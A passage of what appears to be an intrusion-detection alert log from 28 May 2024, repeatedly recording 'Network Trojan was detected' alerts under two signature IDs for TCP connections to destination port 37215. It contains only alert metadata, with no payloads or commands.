            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748504
            SID:2829579
            Source Port:40816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.900091
            SID:2829579
            Source Port:54552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433502
            SID:2829579
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818140
            SID:2829579
            Source Port:38616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872685
            SID:2829579
            Source Port:40416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300030
            SID:2835222
            Source Port:44938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591596
            SID:2829579
            Source Port:52568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640493
            SID:2835222
            Source Port:40212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335814
            SID:2835222
            Source Port:54504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811979
            SID:2829579
            Source Port:40246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563373
            SID:2829579
            Source Port:40290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804233
            SID:2835222
            Source Port:56974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320574
            SID:2835222
            Source Port:56952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892653
            SID:2829579
            Source Port:47134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779156
            SID:2829579
            Source Port:44588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778304
            SID:2829579
            Source Port:53208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841465
            SID:2829579
            Source Port:50936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611258
            SID:2829579
            Source Port:60872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870763
            SID:2835222
            Source Port:40504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005997
            SID:2835222
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861856
            SID:2829579
            Source Port:58814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762502
            SID:2829579
            Source Port:40982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870421
            SID:2829579
            Source Port:32858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804681
            SID:2835222
            Source Port:45450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067481
            SID:2829579
            Source Port:54498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910566
            SID:2829579
            Source Port:52824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896848
            SID:2829579
            Source Port:42778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954086
            SID:2829579
            Source Port:42384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628632
            SID:2835222
            Source Port:59458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952749
            SID:2829579
            Source Port:48964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912055
            SID:2829579
            Source Port:37224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743921
            SID:2835222
            Source Port:39246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968397
            SID:2835222
            Source Port:35210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704865
            SID:2829579
            Source Port:57320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507116
            SID:2835222
            Source Port:52006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065791
            SID:2829579
            Source Port:52180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920137
            SID:2829579
            Source Port:53380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047342
            SID:2835222
            Source Port:54392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066691
            SID:2829579
            Source Port:34064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280327
            SID:2835222
            Source Port:50860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043164
            SID:2829579
            Source Port:60518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766525
            SID:2829579
            Source Port:38374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946311
            SID:2829579
            Source Port:37856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392453
            SID:2829579
            Source Port:41366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938248
            SID:2829579
            Source Port:58918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777051
            SID:2829579
            Source Port:46448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601856
            SID:2829579
            Source Port:43080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918217
            SID:2835222
            Source Port:47560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687772
            SID:2835222
            Source Port:46224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774447
            SID:2829579
            Source Port:48212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880514
            SID:2829579
            Source Port:52920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808830
            SID:2835222
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921377
            SID:2835222
            Source Port:54664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899969
            SID:2835222
            Source Port:56008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772304
            SID:2835222
            Source Port:43826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398336
            SID:2835222
            Source Port:49784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778222
            SID:2829579
            Source Port:54090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655853
            SID:2829579
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900626
            SID:2829579
            Source Port:32864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.625897
            SID:2829579
            Source Port:39586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309504
            SID:2829579
            Source Port:59120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924328
            SID:2835222
            Source Port:43992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770773
            SID:2835222
            Source Port:53750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988980
            SID:2835222
            Source Port:39286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064059
            SID:2835222
            Source Port:34294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086350
            SID:2835222
            Source Port:44174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058561
            SID:2835222
            Source Port:47920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932713
            SID:2835222
            Source Port:42594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.438622
            SID:2835222
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895875
            SID:2829579
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908862
            SID:2829579
            Source Port:48766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915498
            SID:2835222
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861644
            SID:2835222
            Source Port:33412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586659
            SID:2829579
            Source Port:43038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737337
            SID:2829579
            Source Port:50676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506456
            SID:2829579
            Source Port:38384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442830
            SID:2835222
            Source Port:50748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887704
            SID:2835222
            Source Port:44694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.858047
            SID:2829579
            Source Port:37312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046571
            SID:2829579
            Source Port:41492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384630
            SID:2829579
            Source Port:46868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858335
            SID:2835222
            Source Port:56170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754994
            SID:2829579
            Source Port:59736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843770
            SID:2829579
            Source Port:49628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031493
            SID:2835222
            Source Port:34848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843520
            SID:2835222
            Source Port:51588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834441
            SID:2835222
            Source Port:58178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808769
            SID:2835222
            Source Port:45296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470033
            SID:2829579
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863440
            SID:2829579
            Source Port:55660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617837
            SID:2829579
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.660769
            SID:2829579
            Source Port:42786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879085
            SID:2835222
            Source Port:56596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916632
            SID:2829579
            Source Port:35944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527434
            SID:2835222
            Source Port:35624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840952
            SID:2835222
            Source Port:51476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398304
            SID:2829579
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396383
            SID:2835222
            Source Port:36134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626163
            SID:2835222
            Source Port:49844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753762
            SID:2829579
            Source Port:45416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762351
            SID:2835222
            Source Port:60692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004013
            SID:2829579
            Source Port:50466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605229
            SID:2829579
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968558
            SID:2829579
            Source Port:32794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190216
            SID:2835222
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873399
            SID:2829579
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776220
            SID:2829579
            Source Port:40178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778296
            SID:2829579
            Source Port:42904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670420
            SID:2829579
            Source Port:46980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879664
            SID:2835222
            Source Port:34304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055874
            SID:2829579
            Source Port:42542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922302
            SID:2835222
            Source Port:55878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767361
            SID:2835222
            Source Port:38650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058769
            SID:2835222
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905009
            SID:2835222
            Source Port:50566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777439
            SID:2829579
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507258
            SID:2835222
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289002
            SID:2829579
            Source Port:55000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952480
            SID:2829579
            Source Port:33428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709531
            SID:2829579
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.882746
            SID:2835222
            Source Port:56132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001491
            SID:2829579
            Source Port:54060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392385
            SID:2829579
            Source Port:58786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786583
            SID:2835222
            Source Port:46390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433574
            SID:2835222
            Source Port:46620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.971798
            SID:2835222
            Source Port:42580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062076
            SID:2835222
            Source Port:44460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454074
            SID:2829579
            Source Port:43130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804842
            SID:2829579
            Source Port:37318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.915927
            SID:2829579
            Source Port:46094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356928
            SID:2829579
            Source Port:48988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857452
            SID:2829579
            Source Port:44622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319288
            SID:2829579
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371203
            SID:2835222
            Source Port:43574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482803
            SID:2829579
            Source Port:53908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895420
            SID:2829579
            Source Port:58146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601920
            SID:2835222
            Source Port:54874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753799
            SID:2829579
            Source Port:57666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594530
            SID:2829579
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546162
            SID:2835222
            Source Port:34704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556345
            SID:2829579
            Source Port:44632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837817
            SID:2829579
            Source Port:33122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.083670
            SID:2835222
            Source Port:44750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770754
            SID:2829579
            Source Port:43580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777490
            SID:2829579
            Source Port:37506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930073
            SID:2835222
            Source Port:58398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326733
            SID:2835222
            Source Port:60186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840036
            SID:2835222
            Source Port:33220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721386
            SID:2835222
            Source Port:42568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261924
            SID:2829579
            Source Port:50450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766630
            SID:2829579
            Source Port:40748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836535
            SID:2835222
            Source Port:54988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412690
            SID:2829579
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340051
            SID:2835222
            Source Port:54680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714612
            SID:2829579
            Source Port:58130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.667137
            SID:2835222
            Source Port:42114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996260
            SID:2835222
            Source Port:49246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.469781
            SID:2829579
            Source Port:59548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752185
            SID:2835222
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941792
            SID:2835222
            Source Port:35994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727549
            SID:2835222
            Source Port:41144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899654
            SID:2835222
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.886028
            SID:2829579
            Source Port:55562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953119
            SID:2829579
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827329
            SID:2835222
            Source Port:53158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661944
            SID:2829579
            Source Port:34932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784684
            SID:2829579
            Source Port:47528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817737
            SID:2829579
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506960
            SID:2835222
            Source Port:46904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865847
            SID:2829579
            Source Port:50452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437031
            SID:2835222
            Source Port:56354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.999017
            SID:2835222
            Source Port:51218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861427
            SID:2829579
            Source Port:59616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523478
            SID:2829579
            Source Port:53516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553142
            SID:2829579
            Source Port:53858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341870
            SID:2829579
            Source Port:35730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753275
            SID:2835222
            Source Port:49018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743450
            SID:2829579
            Source Port:39904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.076843
            SID:2835222
            Source Port:43020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815557
            SID:2835222
            Source Port:59146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441400
            SID:2835222
            Source Port:52332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341924
            SID:2829579
            Source Port:51910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018394
            SID:2835222
            Source Port:52488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748548
            SID:2829579
            Source Port:48674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866984
            SID:2829579
            Source Port:44474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841934
            SID:2829579
            Source Port:56320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046150
            SID:2835222
            Source Port:51618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582661
            SID:2835222
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777505
            SID:2829579
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319662
            SID:2829579
            Source Port:48012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880058
            SID:2829579
            Source Port:43566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376634
            SID:2829579
            Source Port:46420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776362
            SID:2829579
            Source Port:33754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918517
            SID:2835222
            Source Port:55362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910902
            SID:2829579
            Source Port:55332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932798
            SID:2829579
            Source Port:60234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745048
            SID:2835222
            Source Port:34730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
